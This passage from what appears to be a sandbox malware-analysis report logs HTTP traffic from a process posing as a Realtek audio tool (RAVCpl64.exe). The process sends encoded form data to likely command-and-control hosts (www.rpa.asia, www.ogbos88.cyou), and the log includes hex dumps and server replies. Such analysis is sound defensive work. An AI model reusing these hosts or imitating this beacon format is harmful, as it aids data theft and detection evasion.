                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:05.970114946 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.11.2049767160.25.166.123807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:08.501307964 CET803OUTPOST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 76 39 57 7a 31 42 35 7a 58 39 74 74 61 55 6f 63 66 6d 39 49 3d
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
                                                                          Jan 9, 2025 16:49:08.852286100 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:08 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:08.852333069 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.11.2049768160.25.166.123807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:11.394234896 CET1289OUTPOST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 6a 5a 7a 43 6b 65 6b 75 6e 38 44 77 2f 37 48 34 35 47 49 55 50 47 6f 6b 4f 2b 79 58 71 46 68 73 48 48 4f 6c 67 34 56 61 74 45 69 49 45 5a 30 72 74 6a 4f 43 43 76 76 6a 78 4c 63 52 34 77 6e 43 42 75 4c 4d 38 64 56 69 41 4b 63 4a 33 49 72 71 72 78 36 39 46 54 2b 45 78 65 59 34 39 6e 34 30 33 69 45 32 62 38 75 65 70 78 4c 36 4c 59 66 42 59 76 69 63 71 52 70 69 31 56 56 7a 34 50 48 6a 45 72 30 69 68 32 64 37 2b 32 43 59 6c 6c 6f 32 6b 78 46 5a 45 39 5a 6c 65 77 51 5a 32 46 55 72 64 42 45 43 7a 6a 55 51 70 72 49 2b 32 6c 75 38 34 45 62 34 59 33 41 6d 63 53 2b 31 76 68 38 36 59 42 37 63 44 6b 42 [TRUNCATED]
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH5eyS
                                                                          Jan 9, 2025 16:49:11.394298077 CET6663OUTData Raw: 4e 65 2b 6c 71 78 6e 5a 64 70 44 72 32 6a 58 53 4b 70 63 44 55 56 36 6a 77 73 54 6b 65 50 68 76 5a 61 54 38 34 54 2b 4d 76 61 4f 33 77 61 48 59 52 43 54 46 59 66 79 4d 45 38 36 6c 67 59 6c 74 34 64 4a 35 38 45 66 77 64 4d 38 58 42 75 2f 63 6d 6b
                                                                          Data Ascii: Ne+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb4u2k
                                                                          Jan 9, 2025 16:49:11.747670889 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:11 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:11.747716904 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.11.2049769160.25.166.123807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:14.279927015 CET526OUTGET /bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:14.627182007 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:14 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:14.627224922 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.11.2049770104.21.13.141807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:19.912571907 CET795OUTPOST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 41 73 77 73 49 6d 57 6d 35 43 47 6a 71 51 42 6a 78 4a 4e 76 51 3d 3d
                                                                          Data Ascii: lV=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZAswsImWm5CGjqQBjxJNvQ==
                                                                          Jan 9, 2025 16:49:20.045648098 CET804INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:19 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpzrW1OaMxavkcX3%2FRE174E5yAEvT7UybNvn3FjGSpfC3Vnv9FQDuWkJirdzOFpRpCIIUN8Bex7hfiNKi6CunhbX8K%2FDpuU3bYUFJ3hdulQB0jV5sOtSOX1a5RTq22%2Ba5rMZ"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5939fdc5610ea-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.11.2049771104.21.13.141807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:22.564306974 CET815OUTPOST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 47 47 31 7a 6b 62 76 4b 2f 4e 57 78 72 78 4c 64 46 64 37 6b 3d
                                                                          Data Ascii: lV=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3GG1zkbvK/NWxrxLdFd7k=
                                                                          Jan 9, 2025 16:49:22.705631018 CET810INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:22 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:22 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SOr8e6FdN1Qyj%2BcCNtfpmMkItzs5HRvnf1IoKlygVkMrEEd1STekFYwjEeQ%2FGgzKBwxrO2Egmst%2BfymHE94TZixKwGj9C8LW8fKhJkZ%2Ff9r0I5yLeJyhs%2Bh3qCStVSPK9Xv%2B"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff593b07c6f89f4-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.11.2049772104.21.13.141807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:25.216981888 CET6445OUTPOST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
